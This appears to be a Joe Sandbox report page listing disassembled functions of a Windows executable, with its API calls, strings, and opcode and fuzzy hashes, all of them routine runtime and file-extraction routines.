Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction ID: 48582fcce067e548d7ff64fa9bcd0a941ca91e384192d6a1e30635a58c4cda00
Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction Fuzzy Hash: CB129062E0C24386FB209E15D9542B97693FB80750FDC4136E689867DEDF3CE990AF06

Function 00007FF6399C02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C098F

Strings

f, xrefs: 00007FF6399C042A
p, xrefs: 00007FF6399C0432
f, xrefs: 00007FF6399C03C0
p, xrefs: 00007FF6399C03CD
f, xrefs: 00007FF6399C0575

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction ID: b22143bc2f50c93a94027eabebbc1d648cdc0b5d8ac31c508ef791fd44ae314e
Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction Fuzzy Hash: 1F12AF26E0C14386FF249E14E9147BA6653FB80754F8E4132E699867CEDF3DE980AF10

Function 00007FF6399B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF6399B10FC
fread, xrefs: 00007FF6399B11D7
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B1097
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B10C5
fseek, xrefs: 00007FF6399B10CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6399B10F5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B11D0

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 4401cf50fc904f56722c9161136120d8e1abc21bd9f4aa9546769290e853ac70
Instruction ID: 0656befebd02a607eecd6784ab166cc334db0202db01afd324cccb4f319f27e2
Opcode Fuzzy Hash: 4401cf50fc904f56722c9161136120d8e1abc21bd9f4aa9546769290e853ac70
Instruction Fuzzy Hash: 6A414D21B0864782FA249F12A8405BAA3A2FF54BC4F4C4031DD5E87BDBEE3CE545AB40

Function 00007FF6399B1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF6399B14E0
fread, xrefs: 00007FF6399B15A1
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B146F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B14A9
fseek, xrefs: 00007FF6399B14B0
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6399B14D9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B159A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 49fb08a2c48a59e9195e8aa47434fe87565798205ba13dfc5f4053eff723cb9c
Instruction ID: b7f635d2939a4e9c54fc4397f5e1d3c783f9f7279b58712285b08c5a9790cbc6
Opcode Fuzzy Hash: 49fb08a2c48a59e9195e8aa47434fe87565798205ba13dfc5f4053eff723cb9c
Instruction Fuzzy Hash: 24414122B0864382EA249F15A8515BA63A2FF54BD4F5C4031DE4E87BDBEE7CE545AB00

Function 00007FF6399BDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6399BDD85

Part of subcall function 00007FF6399BECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6399BED1F
Part of subcall function 00007FF6399BECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6399BED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6399BDE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6399BE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6399BE1B8

Strings

csm, xrefs: 00007FF6399BDD9F
csm, xrefs: 00007FF6399BDE80
csm, xrefs: 00007FF6399BDE06

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: be69ab4e69ac48f3952225d81e177e4215e21436fb178db1042bd068d56b4a83
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: 74D17B72A087418AEB249FA5D4403AD37B6FB55788F184235EA4D97BDADF3CE480DB40

Function 00007FF6399CE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6399CE3BA,?,?,0000019DE7D169F8,00007FF6399CA063,?,?,?,00007FF6399C9F5A,?,?,?,00007FF6399C524E), ref: 00007FF6399CE19C
GetProcAddress.KERNEL32(?,?,?,00007FF6399CE3BA,?,?,0000019DE7D169F8,00007FF6399CA063,?,?,?,00007FF6399C9F5A,?,?,?,00007FF6399C524E), ref: 00007FF6399CE1A8

Strings

ext-ms-, xrefs: 00007FF6399CE0F9
api-ms-, xrefs: 00007FF6399CE0E6

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: 85eb7221287fff1d5a213cf0af7511734a256e2e29c285743cb30f9121d4e54d
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: F141CF21F19A0286EB268F56AC006752293BF45BA0F0D4135DD0EC77CEEE3CE885AF40

Function 00007FF6399BCFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD06D
GetLastError.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD113
GetProcAddress.KERNEL32(?,?,?,00007FF6399BD29A,?,?,?,00007FF6399BCF8C,?,?,?,00007FF6399BCB89), ref: 00007FF6399BD11F

Strings

api-ms-, xrefs: 00007FF6399BD08D

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: c33bfc9449a0bafd8bc4479af2f731b1775dfc1c6ded1b778bfb34e45dbe6074
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: C031C466B1AA42D1EE159F12A84067563A6FF08BA4F5E0535DD1D873CAEF3CE442DB00

Function 00007FF6399CA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6399CA46F
FlsGetValue.KERNEL32 ref: 00007FF6399CA484
FlsSetValue.KERNEL32 ref: 00007FF6399CA4A5
FlsSetValue.KERNEL32 ref: 00007FF6399CA4D2
FlsSetValue.KERNEL32 ref: 00007FF6399CA4E3
FlsSetValue.KERNEL32 ref: 00007FF6399CA4F4
SetLastError.KERNEL32 ref: 00007FF6399CA50F

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction ID: 98f7ee20a10b87008a569240446f8a3cf98074ea76f3445855d27169c2225e3a
Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction Fuzzy Hash: AF217921E0E24246FA686F615E9523D61835F887B0F0C4734E93E86BDFEE2CB8416F01

Function 00007FF6399D707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6399D70AD
GetLastError.KERNEL32 ref: 00007FF6399D70B9
CloseHandle.KERNEL32 ref: 00007FF6399D70D1
CreateFileW.KERNEL32 ref: 00007FF6399D70FC
WriteConsoleW.KERNEL32 ref: 00007FF6399D711B

Strings

CONOUT$, xrefs: 00007FF6399D70DD

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: c327a1c576fd2c23f4cfda020a9c6fec5d5f84435993d5abf32d11c4a5d136ca
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: 8B115E21A18A4686E7508F56E89532963A2FF98FE4F084234EA5DC77D9DF7CE444CB40

Function 00007FF6399B81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B827A

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF6399B39F2), ref: 00007FF6399B838A

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 9b5c0b85d41d77bb9b541fba6b9840375d9a6616c292d566ae331ce4538faf90
Instruction ID: 834c98667831e22057056d3d4d063e21c466b5403ca761783c5083c2f809bae7
Opcode Fuzzy Hash: 9b5c0b85d41d77bb9b541fba6b9840375d9a6616c292d566ae331ce4538faf90
Instruction Fuzzy Hash: B441B162A1968281EA709F12A4442BA73A6FF88BC0F484135DF9D977CEDE3CE401DF10

Function 00007FF6399CA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA61D
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA64A
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA65B
FlsSetValue.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA66C
SetLastError.KERNEL32(?,?,?,00007FF6399C43FD,?,?,?,?,00007FF6399C979A,?,?,?,?,00007FF6399C649F), ref: 00007FF6399CA687

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction ID: d0d6dfc03a0201b81b477cb8c7326a4229aa5e60da1a3ab539e8ef9ced94ed27
Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction Fuzzy Hash: 47114A21E0A64246FA546F615F9517D62835F887B4F0C4734E93E867DFEE2CB8416F01

Function 00007FF6399B2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6399B2338
DialogBoxIndirectParamW.USER32 ref: 00007FF6399B23FE
DeleteObject.GDI32 ref: 00007FF6399B2431
DestroyIcon.USER32 ref: 00007FF6399B2443

Strings

Unhandled exception in script, xrefs: 00007FF6399B2368

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
Instruction ID: cbaf5964c2b4139f0680a1699e72caa7d2f2fa6da66d69b672354178729cdca2
Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
Instruction Fuzzy Hash: CE315432A0968289EB20EF61E8552F97361FF89784F480135EA4D8BB9EDF3CD144DB00

Function 00007FF6399B2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B283B
MessageBoxA.USER32 ref: 00007FF6399B284F

Strings

Error/warning (ANSI fallback), xrefs: 00007FF6399B2843
%s%s: %s, xrefs: 00007FF6399B27EC
Error, xrefs: 00007FF6399B282C

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: 1ac101d0c203c0f0ee4e8647d6ea34baa88638c2cf30ff0367ecb9b73be292d2
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: E3216072A28A8681E6209F10F4917EA6365FF84784F440036EA8D837DEDF3CD645DF40

Function 00007FF6399C8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6399C8DC5
GetProcAddress.KERNEL32 ref: 00007FF6399C8DDB
FreeLibrary.KERNEL32 ref: 00007FF6399C8E02

Strings

mscoree.dll, xrefs: 00007FF6399C8DBC
CorExitProcess, xrefs: 00007FF6399C8DD4

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: bd442139d12027af41234eff1224d6e8efdc2ca9556a65d28593d80223d23157
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 5FF06231A1970782EA108F25E8843795322AF49BA1F5C1635C56D867F9CF2CD089EF10

Function 00007FF6399D8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6399D86A0
_set_statfp.LIBCMT ref: 00007FF6399D86BB
_set_statfp.LIBCMT ref: 00007FF6399D86D7
_set_statfp.LIBCMT ref: 00007FF6399D8713

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
